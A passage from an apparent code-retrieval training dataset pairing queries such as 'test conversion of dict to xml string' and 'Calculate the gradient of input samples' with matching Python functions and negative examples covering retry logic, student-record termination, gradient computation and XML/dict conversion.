"def process(self, data, **kwargs):\n # if only a single processor is given, there's no need to map()\n if len(self.processors) == 1:\n return [_process((self.processors[0], data, kwargs))]\n # process data in parallel and return a list with processed data\n return list(self.map(_process, zip(self.processors, it.repeat(data),\n it.repeat(kwargs))))",
"def process(self, data, **kwargs):\n if self.online:\n return self.process_online(data, **kwargs)\n return self.process_offline(data, **kwargs)",
"def _predict_batch_worker(self):\n while True:\n ready = connection.wait(self.return_policy_value,timeout=0.001)\n if not ready:\n continue\n data, result_pipes = [], []\n for pipe in ready:\n while pipe.poll():\n data.append(pipe.recv())\n result_pipes.append(pipe)\n\n data = np.asarray(data, dtype=np.float32)\n # print (data.shape)\n \n policy_array, value_array = self.model.predict_on_batch(data)\n # print (policy_array, value_array)\n for pipe, policy, value in zip(result_pipes, policy_array, value_array):\n pipe.send((policy, float(value)))",
"def retry( # noqa: C901\n attempts: int = 3,\n delay: t.Union[int, float] = 0.5,\n max_delay: t.Union[int, float] = 150.0,\n scale: t.Union[int, float] = 2.0,\n jitter: t.Union[int, float, t.Tuple[t.Union[int, float], t.Union[int, float]]] = 0,\n exceptions: t.Iterable[Type[Exception]] = (Exception,),\n on_exception: t.Union[t.Callable[[Exception, int], t.Any], None] = None,\n) -> t.Callable[[CallableT], CallableT]:\n if not isinstance(attempts, int) or attempts <= 0:\n raise ValueError(\"attempts must be an integer greater than 0\")\n\n if not isinstance(delay, NUMBER_TYPES) or delay < 0:\n raise ValueError(\"delay must be a number greater than or equal to 0\")\n\n if not isinstance(max_delay, NUMBER_TYPES) or max_delay < 0:\n raise ValueError(\"scale must be a number greater than or equal to 0\")\n\n if not isinstance(scale, NUMBER_TYPES) or scale <= 0:\n raise ValueError(\"scale must be a number greater than 0\")\n\n if (\n not isinstance(jitter, NUMBER_TYPES + (tuple,))\n or (isinstance(jitter, NUMBER_TYPES) and jitter < 0)\n or (\n isinstance(jitter, tuple)\n and (len(jitter) != 2 or not all(isinstance(jit, NUMBER_TYPES) for jit in jitter))\n )\n ):\n raise ValueError(\"jitter must be a number greater than 0 or a 2-item tuple of \" \"numbers\")\n\n if not isinstance(exceptions, tuple) or not all(\n issubclass(exc, Exception) for exc in exceptions\n ):\n raise TypeError(\"exceptions must be a tuple of Exception types\")\n\n if on_exception and not callable(on_exception):\n raise TypeError(\"on_exception must be a callable\")\n\n if jitter and not isinstance(jitter, tuple):\n jitter = (0, jitter)\n\n on_exc_argcount = getargcount(on_exception, maxargs=2) if on_exception else None\n\n def decorator(func):\n @wraps(func)\n def decorated(*args, **kwargs):\n delay_time = delay\n\n for attempt in range(1, attempts + 1):\n # pylint: disable=catching-non-exception\n try:\n return func(*args, **kwargs)\n except exceptions as exc:\n if on_exception:\n callit(on_exception, exc, attempt, argcount=on_exc_argcount)\n\n if attempt == attempts:\n raise\n\n if jitter:\n delay_time += max(0, random(*jitter))\n\n if delay_time < 0: # pragma: no cover\n continue\n\n if max_delay:\n delay_time = min(delay_time, max_delay)\n\n time.sleep(delay_time)\n\n # Scale after first iteration.\n delay_time *= scale\n\n return decorated\n\n return decorator",
"def unpack_data(self, usnap=.2): # 2/10th second sleep between empty requests\n for new_data in self.socket:\n if new_data:\n self.data_stream.unpack(new_data)\n else:\n sleep(usnap) # Sleep in seconds after an empty look up.",
"def _bump_backoff(self):\n self.backoff_time = min(self.max_backoff, 2*(self.backoff_time or 1))",
"async def handle_rate_limit(self, response, request) -> \"httpx.Response\":\n while response.status_code == 429:\n errors = response.json()\n if not response.headers.get(\"Via\"):\n raise HTTPException(errors)\n wh_sleep = float(errors[\"retry_after\"]) + 0.15\n logger.error(\n \"Webhook rate limited: sleeping for {wh_sleep} seconds...\".format(\n wh_sleep=round(wh_sleep, 2)\n )\n )\n await asyncio.sleep(wh_sleep)\n response = await request()\n if response.status_code in [200, 204]:\n return response"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Method to terminate student and change state to terminate.
|
def save_terminate(self):
student_rec = self.env["student.student"].browse(
self._context.get("active_id")
)
student_rec.write(
{
"state": "terminate",
"terminate_reason": self.reason,
"active": False,
}
)
student_rec.standard_id._compute_total_student()
for rec in self.env["student.reminder"].search(
[("stu_id", "=", student_rec.id)]
):
rec.active = False
if student_rec.user_id:
student_rec.user_id.active = False
|
[
"def terminate(self):\n self.clear_current_data()\n self.terminated = True",
"def terminate(self) -> None:\r\n self.__state__ = JobState.TERMINATE\r\n log_to_console(self.get_echo())",
"def save_terminate(self):\n student_obj = self.env['student.student'\n ].browse(self._context.get('active_id'))\n event_regi = self.env['school.event.registration'\n ].search([('part_name_id', '=', student_obj.id)])\n if event_regi:\n event_regi.write({'state': 'cancel'})\n event_participant = self.env['school.event.participant'\n ].search([('name', '=', student_obj.id)])\n if event_participant:\n event_participant.unlink()\n return super(TerminateReasonEvent, self).save_terminate()",
"def terminate(self):\n self._logger.info(\n \"Terminate signaled to trainer. Training will stop after current epoch is finished\")\n self.should_terminate = True",
"def clear_student_state(self, *args, **kwargs):\n # pylint: disable=unused-argument\n student_id = kwargs['user_id']\n for submission in submissions_api.get_submissions(\n self.get_student_item_dict(student_id)\n ):\n submission_file_sha1 = submission['answer'].get('sha1')\n submission_filename = submission['answer'].get('filename')\n submission_file_path = self.file_storage_path(submission_file_sha1, submission_filename)\n if default_storage.exists(submission_file_path):\n default_storage.delete(submission_file_path)\n submissions_api.reset_score(\n student_id,\n self.block_course_id,\n self.block_id,\n clear_state=True\n )",
"def _stopping(self):\n \n self.__state = runlevel.STATE_STOPPING",
"def terminate(self):\n\n if not self.job_id:\n raise RankmaniacError('No job is running.')\n\n self._emr_conn.terminate_jobflow(self.job_id)\n self.job_id = None\n\n self._reset()",
"def halt(self):\n self.running = False\n sys.exit(0)",
"def expell(self) -> None:\n super().__del__()\n Person.students -= 1\n print(f'The {self} has been expelled')",
"def end_student_group(self, date, student_group, classname):\n the_history = self.get_student_group_history(classname)\n the_history.end_multiactive_entry(date, student_group, None)",
"def exit_mode(state):\n state.exit_mode()",
"def __callDelStudent(self):\r\n idGiven=input(\" Give student's ID:\")\r\n try:\r\n st=self.__lista.delStudent(idGiven)\r\n self.__notes.delStudentNote(st)\r\n print(\"Student \" +st.getName() +\" has been removed from the catalog.\")\r\n except IdNotFound as ex:\r\n print(ex.getErrors())\r\n except RepositoryError() as ex:\r\n print(ex.getErrors())",
"def halt(self):\n self.__global_state = DFAGlobalState.HALT",
"def stop(self):\n\n self.active = False\n self.join()",
"def _stop_check_state(self, session, params):\n session.set_status('stopping')",
"def exit_state(self):\n self.change_state(StateIDs.SELECT_CHARACTER)",
"def setTerminating(self, name):\n try:\n state = self._states[name]\n except:\n raise ValueError(\"Undefined terminating state '\" + name + \"'\", 5)\n\n state.setTerm(True)",
"def exit(self):\n LOGGER.debug(\"State 'init' exited\")",
"def exit(self):\n\n clearTerminal()\n quitting = True\n if self._modified:\n print('You have made unsaved changes to the ' + self._plural + '. Are you sure you want to exit without saving?\\n')\n quitting = getConfirmation()\n\n if quitting:\n self._running = False\n print('Have a nice day.\\n')"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Calculate the gradient of input samples.
|
def _gradient(self, inputs, labels):
sens = Tensor(np.array([1.0], inputs.dtype))
# get grad of loss over x
out_grad = self._loss_grad(Tensor(inputs), Tensor(labels), sens)
if isinstance(out_grad, tuple):
out_grad = out_grad[0]
gradient = out_grad.asnumpy()
if self._is_targeted:
gradient = -gradient
return normalize_value(gradient, self._norm_level)
|
[
"def gradient(x):\n\t\tpass",
"def _gradient(self, _x, _y):\n ### YOUR CODE HERE\n dl_dwx = self.softmax(_x) - _y\n dl_dx = np.matmul(_x.reshape(self.n_features,1), dl_dwx.reshape(1,self.k))\n _g = dl_dx\n return _g\n ### END YOUR CODE",
"def grad_input(self, x):\n # Compute the gradient of the mean function.\n d_kernel = self.kernel.grad_input(x, self.X)\n d_mean = d_kernel.T.dot(self.alpha)\n # Compute the gradient of the standard deviation function. It is\n # absolutely crucial to note that the predict method returns the\n # variance, not the standard deviation, of the prediction.\n sd = np.sqrt(self.predict(x)[1])\n K_cross = self.kernel.cov(x, self.X)\n M = spla.cho_solve((self.L, True), K_cross.T).ravel()\n d_sd = -d_kernel.T.dot(M) / sd\n return d_mean, d_sd",
"def compute_gradient(self, model, x, y):\n\t\tpass",
"def calc_gradient(self, X_train, y_train):\n scores = np.dot(X_train, self.w)\n correct_scores = np.choose(y_train, scores.T)\n\n margins = np.maximum(0, (scores.T - correct_scores + 1)).T\n for i in range(len(margins)):\n margins[i][y_train[i]] = 0\n\n hinge_loss = np.sum(margins)\n reg_loss = 0.5 * self.reg_const * np.sum(self.w ** 2)\n loss = reg_loss + hinge_loss / self.batch_size\n\n margins_grad = margins\n margins_grad[margins > 0] = 1\n false_counts = np.sum(margins_grad, axis=1)\n for i in range(len(margins)):\n margins[i][y_train[i]] -= false_counts[i]\n\n grad = np.dot(X_train.T, margins_grad)\n grad /= self.batch_size\n grad += self.reg_const * self.w\n\n return grad, loss",
"def gradient(self, param_values: np.ndarray) -> np.ndarray:\n raise NotImplementedError",
"def gradient(self, point):\n gradient = np.zeros((self.dimension(),), dtype='float')\n for j in range(len(self.sample)):\n delta_y = point[1]-self.sample[j][1]\n delta_x = point[0]-self.sample[j][0]\n partial_x = -delta_y/(delta_x**2+delta_y**2)\n partial_y = delta_x/(delta_x**2+delta_y**2)\n gradient[0] -= error(self.sample[j], point)*partial_x\n gradient[1] -= error(self.sample[j], point)*partial_y\n return gradient",
"def gradient(self):\n gx, gy = np.gradient(self.zz)\n return gx, gy",
"def _calculate_trainable_parameters_gradient(self, input, backwards_input):\n pass",
"def compute_grad(X, y, w):\n m = X.shape[0]\n A = probability(X, w)\n dZ = A - y\n #cost = compute_loss(\n dW = np.dot(dZ, X) / float(m)\n \n return dW",
"def f_grad(self, x):\n gradient = []\n\n for key in self.mean_functions:\n gradient.push(self.mean_functions[key][1](x))\n\n return np.array(gradient)",
"def compute_gradients(self,loss):\n\t\tgrads = T.grad(loss, self.rnn.params)\n\t\treturn zip(self.rnn.params, grads)",
"def calc_gradient_at(self, x: np.ndarray) -> np.ndarray:\n return gradient_approximation(self.f, x)",
"def accumulate_gradients(self):\n for k in range(self.last_layer, -1, -1):\n self.g[k] = self.g[k] + np.matmul(self.d[k].T, self.a[k])",
"def compute_gradient(y, tx, w):\n # ***************************************************\n # INSERT YOUR CODE HERE\n # TODO: compute gradient vector\n # ***************************************************\n raise NotImplementedError",
"def GetGradient(self, x):\n return _handle.OperatorHandle_GetGradient(self, x)",
"def gradient(self, x, w=None):\n # Transform data using inner preprocess, if defined\n x, y = self._check_input(x)\n self._check_is_fitted()\n self._clear_cache()\n\n x_prc = self._forward_preprocess(x, caching=True)\n if self._grad_requires_forward:\n self._forward(x_prc) # this is called only if required\n return self.backward(w)",
"def calculate_gradients(self, wanted_outputs, actual_outputs):\n wanted_outputs = _to_numpy_column(wanted_outputs)\n actual_outputs = _to_numpy_column(actual_outputs)\n\n a = self.error.deltas(wanted_outputs, actual_outputs)\n b = self.activation.f_prime(self.v[-1])\n deltas = (a * b)\n\n gradients = list()\n for weights, y, v in reversed(zip(self.weights, self.y[:-1], self.v[:-1])):\n prev_y = np.vstack([1, y])\n prev_v = np.vstack([1, v])\n\n gradients.append(deltas * prev_y.T)\n assert gradients[-1].shape == weights.shape\n\n a = self.activation.f_prime(prev_v)\n b = weights.T.dot(deltas)\n deltas = (a * b)[1:]\n\n self._input_deltas = deltas\n return reversed(gradients)",
"def gradient(self, x, y_actual, args):\n weights = args[0]\n self.update_weights(weights)\n # Update zeroth layer\n self.layer0 = x.tolist()\n\n # Begin backtracking\n y = self.predict(x)\n grad_cache = np.zeros((self.num_units_per_layer, self.num_units_per_layer, 4))\n grad_cache.fill(0.0)\n\n # Find 3rd layer of derivatives\n for i in range(0, self.num_units_per_layer):\n grad_cache[i, 1, 3] = (y - y_actual) * self.layer2[i]\n\n # Find 2nd layer of derivatives\n for i in range(0, self.num_units_per_layer):\n for j in range(1, self.num_units_per_layer):\n grad_cache[i, j, 2] = grad_cache[j, 1, 3] * self.weights[j, 1, 3] * (1.0 - self.layer2[j]) * self.layer1[i]\n\n # Find 3rd layer of derivatives\n for i in range(0, x.shape[0]):\n for j in range(1, self.num_units_per_layer):\n grad_cache[i, j, 1] = x[i] * (1.0 - self.layer1[j]) * np.sum(np.multiply(self.weights[j, :, 2], grad_cache[j, :, 2]))\n\n return grad_cache"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
test conversion of xml string to dict
|
def test_xml_to_dict(self):
expected = self.data
result = convert.xml_to_dict(self.xml)
self.assertEqual(expected, result)
|
[
"def test_xmldict(self):\n xml = self.xml_data\n from_string = xmldict.xml_to_dict(xml)\n\n d = {'contact': {'fname': 'Joe', 'lname': 'Smith'},\n 'query': {'field': 'ass', 'where': 'ass'}}\n\n from_dict = xmldict.dict_to_xml(d)\n\n # print the dict created from xml string\n termprint('INFO', from_string)\n\n # print the xml string created from dict\n termprint('WARNING', from_dict)",
"def xml_str_to_dict(s):\n xml = minidom.parseString(s)\n return pythonzimbra.tools.xmlserializer.dom_to_dict(xml.firstChild)",
"def test_read_xml_string_to_dict_for_staff(self):\n staff_output = {}\n staff_tag = None\n for element, tag in read_xml_string(self.xml_string, records_tag=['staff'], to_dict=True):\n staff_output = element\n staff_tag = tag\n\n self.assertDictEqual(staff_output, self.expected_output)\n self.assertEqual(staff_tag, 'staff')",
"def parse_str_to_dict(self, data: str) -> OrderedDict:\n return xmltodict.parse(data)",
"def ConvertXmlToDict(root, dictclass=XmlDictObject):\r\n\r\n # If a string is passed in, try to open it as a file\r\n if isinstance(root, str):\r\n import io\r\n \r\n root = io.StringIO(root)\r\n root = ElementTree.parse(root).getroot()\r\n elif not ElementTree.iselement(root):\r\n print('Expected ElementTree.Element or file path string')\r\n\r\n return dictclass({root.tag: _ConvertXmlToDictRecurse(root, dictclass)})",
"def convert_xml_to_dict(root, dictclass=XmlDictObject):\n # If a string is passed in, try to open it as a file\n if isinstance(root, basestring):\n root = _try_parse(root)\n elif not isinstance(root, ETree.Element):\n raise TypeError('Expected ElementTree.Element or file path string')\n\n return dictclass({root.tag: _convert_xml_to_dict_recurse(root, dictclass)})",
"def test_xml_data_parser(self):\n data = utils.xml_data_parser()\n self.assertIsInstance(data, dict)\n self.assertIsInstance(data.keys()[0], int)\n self.assertEqual(\n data[141], {\n 'name': 'Adam P.',\n 'avatar': 'https://intranet.stxnext.pl/api/images/users/141'\n }\n )",
"def test_xml_exist(xml_parser):\n\n xml_data = xml_parser()\n assert xml_data.get_dict()",
"def test_simple_str_to_dict(self):\n d = msgmap.str_to_dict('k1:v1 k2:v2 k3:v3')\n self.assertEqual(len(d), 3)\n self.assertEqual(d.get('k1'), 'v1')\n self.assertEqual(d.get('k2'), 'v2')\n self.assertEqual(d.get('k3'), 'v3')",
"def test_read_xml_string_to_dict_for_operations_department(self):\n operations_department_output = {}\n operations_department_tag = None\n for element, tag in read_xml_string(self.xml_string, records_tag=['operations_department'], to_dict=True):\n operations_department_output = element\n operations_department_tag = tag\n\n self.assertDictEqual(operations_department_output, self.expected_output['operations_department'])\n self.assertEqual(operations_department_tag, 'operations_department')",
"def test_empty_str_to_dict(self):\n d = msgmap.str_to_dict('')\n self.assertEqual(len(d), 0)",
"def test_read_xml_string_to_dict_for_employees(self):\n employees_output = []\n\n for element, tag in read_xml_string(self.xml_string, records_tag=['employees'], to_dict=True):\n if tag == \"employees\":\n employees_output.append(element['bio'])\n\n self.assertListEqual(employees_output, self.expected_output['operations_department']['employees'])",
"def test_json_converter(self):\r\n result = json_processor.convert_json_to_dict(self.example_json_string)\r\n self.assertEqual(self.expected_output, result)",
"def test_xmlparser_deserialiser(self):\n sampletext = '\"Guido Rossum\", \"88 Palo Alto\", \"776985411\"' \n self.assertEqual(self.xmlo.deserialise(\"./test_input.xml\")[0].csv(), sampletext)\n return",
"def eval_xml(xml_string):\n result_dict = {}\n provisional_references_dict = {}\n # Parse XML string\n doc = ET.fromstring(xml_string)\n # List containing the relevant tags\n tags = ['doknr', 'ecli', 'gertyp', 'gerort', 'spruchkoerper', 'entsch-datum', 'aktenzeichen', 'doktyp', 'norm', 'vorinstanz', 'gruende', 'entscheidungsgruende', 'identifier', 'sonstlt', 'abwmeinung', 'tatbestand', 'tenor', 'sonstosatz', 'leitsatz', 'titelzeile', 'mitwirkung', 'region']\n tags_translation = {'doknr': 'documentnumber',\n 'ecli': 'ecli',\n 'gertyp': 'court',\n 'gerort': 'courtlocation',\n 'spruchkoerper': 'spruchkoerper',\n 'entsch-datum': 'date',\n 'aktenzeichen': 'filenumber',\n 'doktyp': 'documenttype',\n 'entscheidungsgruende': 'reasonfordecision',\n 'abwmeinung': 'abwmeinung',\n 'sonstosatz': 'miscsentence',\n 'norm': 'norms',\n 'vorinstanz': 'previouscourt',\n 'gruende': 'reasons',\n 'identifier': 'identifier',\n 'sonstlt': 'other',\n 'tatbestand': 'offense',\n 'tenor': 'tenor',\n 'leitsatz': 'keysentence',\n 'titelzeile': 'title',\n 'mitwirkung': 'mitwirkung',\n 'region': 'region'}\n\n # Load each tag into dictionary:\n\n outgoing_references_dict = {} # Contains additional information about where the references are\n outgoing_references_set = set() # Contains only the referenced filenumbers\n for tag in tags:\n tag_array = [] # Contains child-tags\n # Iterate through child tags of a tag:\n for child in doc.find(tag).iter():\n if child.text and child.text.rstrip() != \"\":\n if tag == 'entsch-datum':\n tag_array.append(int(child.text)) # Append child date to array as int\n else:\n tag_array.append(child.text.strip()) # Append child tag to array\n # If the array only contains one element, or the tag doesn't have child-tags,\n # only load that tag into the directory. Array is empty if there is no value inside the tag:\n if len(tag_array) == 1:\n if tag == 'vorinstanz':\n outgoing_references, outgoing_references_set = ref.find_reference(tag_array, outgoing_references_set)\n #outgoing_references_dict.append(outgoing_references)\n outgoing_references_dict[tag] = outgoing_references\n # Enter Data into the correct translated dict entry\n result_dict[tags_translation[tag]] = tag_array[0]\n else:\n # Specific tags require search for references\n # This path also enters any tags that are contained in arrays\n reference_tags = ['gruende', 'tenor', 'entscheidungsgruende', 'tatbestand', 'leitsatz', 'vorinstanz']\n if tag in reference_tags:\n outgoing_references, outgoing_references_set = ref.find_reference(tag_array, outgoing_references_set)\n # outgoing_references_dict.append(outgoing_references)\n outgoing_references_dict[tag] = outgoing_references #todo tags_translation?\n result_dict[tags_translation[tag]] = tag_array\n\n result_dict['keywords'] = []\n result_dict['incoming_count'] = -1\n result_dict['successful'] = \"\"\n\n # build provisional reference-dict for ES that does not contain incoming references yet:\n provisional_references_dict = create_reference_dict(result_dict['filenumber'], outgoing_references_dict, outgoing_references_set, [], result_dict['documentnumber'])\n # ES fields: [ID][filenumber][list outgoing references][set outgoing references][set incoming references]\n # [sum of incoming references]\n\n return result_dict, provisional_references_dict",
"def deserialize(self, str):",
"def test_manifest_parses(self):\n self.assertIsInstance(self.json, dict)",
"def test_string_roundtrip(self):\n block = self.create_block(\"leafwithdictandlist\")\n\n expected_seq = [b'1', b'2']\n expected_dict = {b'1': b'1', b'ping': b'ack'}\n block.sequence = expected_seq\n block.dictionary = expected_dict\n self.assertRaises(TypeError, self.export_xml_for_block, block)",
"def parseFromXml( self, sKey, sXML ):\n\t\tiBegin = 0\n\t\tiEnd = 0\n\t\tsXML = sXML.decode('utf8')\n\t\tiBegin = sXML.find( '<%s>' % sKey )\n\t\tif iBegin == -1:\n\t\t\treturn False\n\t\t\n\t\tiBegin += len( sKey ) + 2 # begin after the tag\n\t\tiEnd = sXML.find( '</%s>' % sKey )\n\t\tif iEnd == -1:\n\t\t\treturn False\n\t\t\n\t\tsResult = sXML[ iBegin : iEnd ].replace( '&', '&' )\n\t\treturn unicode(sResult)",
"def test_xmlparser_serialiser(self):\n\n sampletext = \"\"\"<root>\n <doc><name>\"Guido Rossum\"</name><address> \"88 Palo Alto\"</address><phone> \"776985411\"</phone></doc>\n <doc><name>\"John Smith\"</name><address> \"38 Driver Avenue\"</address><phone> \"091234567\"</phone></doc>\n <doc><name>\"Jane Doe\"</name><address> \"17 Waine Street\"</address><phone> \"0494512390\"</phone></doc>\n</root>\n\"\"\" \n self.assertEqual(self.xmlo.serialise(\"./test_input.txt\"), sampletext)\n\n return"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
test conversion of dict to xml string
|
def test_dict_to_xml(self):
expected = self.xml
result = convert.dict_to_xml(self.data)
self.assertEqual(expected, result)
|
[
"def test_xmldict(self):\n xml = self.xml_data\n from_string = xmldict.xml_to_dict(xml)\n\n d = {'contact': {'fname': 'Joe', 'lname': 'Smith'},\n 'query': {'field': 'ass', 'where': 'ass'}}\n\n from_dict = xmldict.dict_to_xml(d)\n\n # print the dict created from xml string\n termprint('INFO', from_string)\n\n # print the xml string created from dict\n termprint('WARNING', from_dict)",
"def dict_to_xml(tag, d):\r\n elem = Element(tag)\r\n for key, val in d.items():\r\n child = Element(key)\r\n child.text = str(val)\r\n elem.append(child)\r\n return elem",
"def ConvertDictToXml(xmldict):\r\n\r\n roottag = list(xmldict)[0]\r\n root = ElementTree.Element(roottag)\r\n _ConvertDictToXmlRecurse(root, xmldict[roottag])\r\n\r\n return ElementTree.tostring(root)",
"def convert_dict_to_xml(xmldict):\n\n roottag = xmldict.keys()[0]\n root = ETree.Element(roottag)\n _convert_dict_to_xml_recurse(root, xmldict[roottag])\n return root",
"def test_empty_dict_to_str(self):\n s = msgmap.dict_to_str(dict())\n self.assertEqual(len(s), 0)",
"def d2xml(d):\n def _d2xml(d, p):\n for k,v in d.items():\n if isinstance(v,dict):\n node = etree.SubElement(p, k)\n _d2xml(v, node)\n elif isinstance(v,list):\n for item in v:\n node = etree.SubElement(p, k)\n _d2xml(item, node)\n elif k == \"__text__\":\n p.text = v\n elif k == \"__tail__\":\n p.tail = v\n else:\n p.set(k, v)\n\n k,v = d.items()[0]\n node = etree.Element(k)\n _d2xml(v, node)\n return node",
"def generateXml(obj):\r\n if isinstance(obj, dict) or isinstance(obj,DictMixin):\r\n return getXML_dict(obj, \"item\")\r\n elif isinstance(obj,collections.Iterable):\r\n return \"<list>%s</list>\" % getXML(obj, \"item\")\r\n else:\r\n raise RuntimeError(\"Unable to convert to XML: %s\" % obj)",
"def d2xml(d):\n def _d2xml(d, p):\n for k,v in d.items():\n if isinstance(v,dict):\n node = etree.SubElement(p, k)\n _d2xml(v, node)\n elif isinstance(v,list):\n for item in v:\n node = etree.SubElement(p, k)\n _d2xml(item, node)\n elif k == \"__text__\":\n p.text = v\n elif k == \"__tail__\":\n p.tail = v\n else:\n p.set(k, v)\n\n key = list(d.keys())[0]\n root = etree.Element(key)\n _d2xml(d[key], root)\n return root",
"def _get_xml_value(value):\n retval = []\n if isinstance(value, dict):\n for key, value in value.items():\n retval.append('<' + xml_escape(text_type(key)) + '>')\n retval.append(_get_xml_value(value))\n retval.append('</' + xml_escape(text_type(key)) + '>')\n elif isinstance(value, list):\n for key, value in enumerate(value):\n retval.append('<child order=\"' + xml_escape(text_type(key)) + '\">')\n retval.append(_get_xml_value(value))\n retval.append('</child>')\n elif isinstance(value, bool):\n retval.append(xml_escape(text_type(value).lower()))\n elif isinstance(value, binary_type):\n retval.append(xml_escape(value.encode('utf-8')))\n elif isinstance(value, text_type):\n retval.append(xml_escape(value))\n else:\n retval.append(xml_escape(text_type(value)))\n return \"\".join(retval)",
"def _dict_to_etree_rec(self, content, tree):\n if type(content) == dict:\n for key, value in content.items():\n e = ElementTree.Element(key)\n self._dict_to_etree_rec(value, e)\n tree.append(e)\n else:\n tree.text = str(content)",
"def map_to_xml(mapping, root=None, command=None):\n envelope = None\n\n if root is None:\n envelope, root = get_envelope(command)\n\n for tag, value in mapping:\n tag = ElementTree.Element(tag)\n\n if type(value) == tuple:\n # Allow for nesting.\n value = map_to_xml(value, tag)\n elif type(value) == list:\n # This conditional lets us expand lists into multiple elements with\n # the same name:\n #\n # ((\"test\", ((\"test_child\", [1, 2, 3]),)),)\n #\n # will be serialized as:\n #\n # <test>\n # <test_child>1</test_child>\n # <test_child>2</test_child>\n # <test_child>3</test_child>\n # </test>\n value_list = tuple((tag.tag, value) for value in value)\n value = map_to_xml(value_list, root)\n continue\n elif type(value) == dict:\n # This conditional expands dicts into name/value pairs, as required\n # by some Silverpop method:\n #\n # ((\"COLUMN\", {\"a\": 1}),)\n #\n # will be serialized as:\n #\n # <COLUMN>\n # <NAME>a</NAME>\n # <VALUE>1</VALUE>\n # </COLUMN>\n value_list = ()\n for column_name, column_value in six.iteritems(value):\n value_list += (((tag.tag), ((\"NAME\", column_name), (\"VALUE\", column_value))),)\n\n value = map_to_xml(value_list, root)\n continue\n\n elif not type(value) == bool:\n # If the value isn't True/False, we can set the node's text value.\n # If the value is True, the tag will still be appended but will be\n # self-closing.\n tag.text = u\"%s\" % (value)\n\n if value:\n root.append(tag)\n\n if envelope is not None:\n root = envelope\n return ElementTree.tostring(root)",
"def json2xml(json_obj: Dict[str, str]) -> str:\n result_list = []\n\n json_obj_type = type(json_obj)\n\n if json_obj_type is dict:\n count = 0\n for tag_name in json_obj:\n sub_obj = json_obj[tag_name]\n result_list.append(\"<entry lxnm:entryID='%s' xmlns:lxnm='http://www.lexonomy.eu/'>\" % (count))\n result_list.append(\"<headword xml:space='preserve'>%s</headword>\" % (tag_name))\n result_list.append('<sense>')\n result_list.append(\"<translation xml:space='preserve'>%s</translation>\" % (str(sub_obj)))\n result_list.append('</sense>')\n result_list.append('</entry>')\n count +=1\n return \"\".join(result_list)\n\n return \"%s%s\" % (json_obj)",
"def _dict_to_etree_rec(self, content, tree):\n if type(content) == dict:\n for key, value in content.items():\n element = ElementTree.Element(key)\n self._dict_to_etree_rec(value, element)\n tree.append(element)\n else:\n tree.text = str(content)",
"def render_xml(self, d):\n\t\tself.set_flag(\"render\", False)\n\t\tself.response.headers[\"Content-Type\"] = \"application/xml\"\n\t\txml_txt = xml.dicttoxml(d)\n\t\tself.response.out.write(xml_txt)",
"def to_xmls (foo, indent = 1):\n if type(foo) == type({}):\n return __print_dict(foo, indent)\n elif type(foo) == type([]) or type(foo) == type(()):\n return __print_list(foo, indent)\n else:\n return __print_scalar(foo, indent)",
"def test_to_xml(self):\n composer = Composer(TextType(\"Henry Mancini\"))\n expected = \"\"\"<composer name=\"Henry Mancini\"/>\"\"\"\n self.assertEqual(expected, composer.to_xml())",
"def save_xml(dictionary, path_to_save, encoding=\"utf8\"):\n def text_xml(dictionary, level=0):\n text = \"\"\n tags = list(dictionary.keys())\n keys = []\n for i in range(len(tags)): # Run through the dictionary\n if type(dictionary[tags[i]]) is str or dictionary[tags[i]] is None:\n keys.append(tags[i]) # Add <tag>value</tag> or <tag/> tags first\n for i in range(len(tags)):\n if not (type(dictionary[tags[i]]) is str or dictionary[tags[i]] is None):\n keys.append(tags[i]) # Add complex tags (dictionary, list) at the end\n\n for key in keys:\n if dictionary[key] is None or dictionary[key] == '':\n text += level * '\\t'\n text += \"<{}/>\\n\".format(key)\n elif type(dictionary[key]) is str:\n text += level * '\\t'\n text += \"<{}>{}</{}>\\n\".format(key, dictionary[key], key)\n elif type(dictionary[key]) is XmlDict or type(dictionary[key]) is dict:\n text += level * '\\t'\n text += \"<{}>\\n{}{}</{}>\\n\".format(key, text_xml(dictionary[key], level + 1), level * '\\t', key)\n elif type(dictionary[key]) is list:\n content = [\"{}<{}>\\n{}{}</{}>\\n\".format(level * '\\t', key,\n text_xml(dictionary[key][i], level + 1),\n level * '\\t', key) for i in range(len(dictionary[key]))]\n text += ''.join(content)\n return text\n\n with open(path_to_save, encoding=encoding, mode='w') as file:\n text = text_xml(dictionary)\n file.write('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\\n')\n file.write(text)\n file.close()",
"def test_string_roundtrip(self):\n block = self.create_block(\"leafwithdictandlist\")\n\n expected_seq = [b'1', b'2']\n expected_dict = {b'1': b'1', b'ping': b'ack'}\n block.sequence = expected_seq\n block.dictionary = expected_dict\n self.assertRaises(TypeError, self.export_xml_for_block, block)",
"def jsonp2xml(json):\n ret = \"\"\n content = None\n for c in [str, int, unicode]:\n if isinstance(json, c):\n return str(json)\n if not isinstance(json, dict):\n raise Exception(\"class type: %s\" % json)\n\n # every tag is a dict.\n # its value can be a string, a list or a dict\n for tag in json.keys():\n tag_list = json[tag]\n\n # if tag_list is a list, then it represent a list of elements\n # ex. {index: [{ 'a':'1'} , {'a':'2'} ] }\n # --> <index a=\"1\" /> <index b=\"2\" />\n if isinstance(tag_list, list):\n for t in tag_list:\n # for every element, get the attributes\n # and embed them in the tag named\n attributes = \"\"\n content = \"\"\n if not isinstance(t, dict):\n ret += \"%s\" % t\n else:\n for (attr, value) in t.iteritems():\n # only serializable values are attributes\n if value.__class__.__name__ in 'str':\n attributes = \"\"\"%s %s=\"%s\" \"\"\" % (\n attributes,\n attr,\n cgi.escape(\n stringutils.to_unicode(value), quote=None)\n )\n elif value.__class__.__name__ in ['int', 'unicode', 'bool', 'long']:\n attributes = \"\"\"%s %s=\"%s\" \"\"\" % (\n attributes, attr, value)\n # other values are content\n elif isinstance(value, dict):\n content += ResponseHelper.jsonp2xml(value)\n elif isinstance(value, list):\n content += ResponseHelper.jsonp2xml(\n {attr: value})\n if content:\n ret += \"<%s%s>%s</%s>\" % (\n tag, attributes, content, tag)\n else:\n ret += \"<%s%s/>\" % (tag, attributes)\n elif isinstance(tag_list, dict):\n attributes = \"\"\n content = \"\"\n\n for (attr, value) in tag_list.iteritems():\n # only string values are attributes\n if not 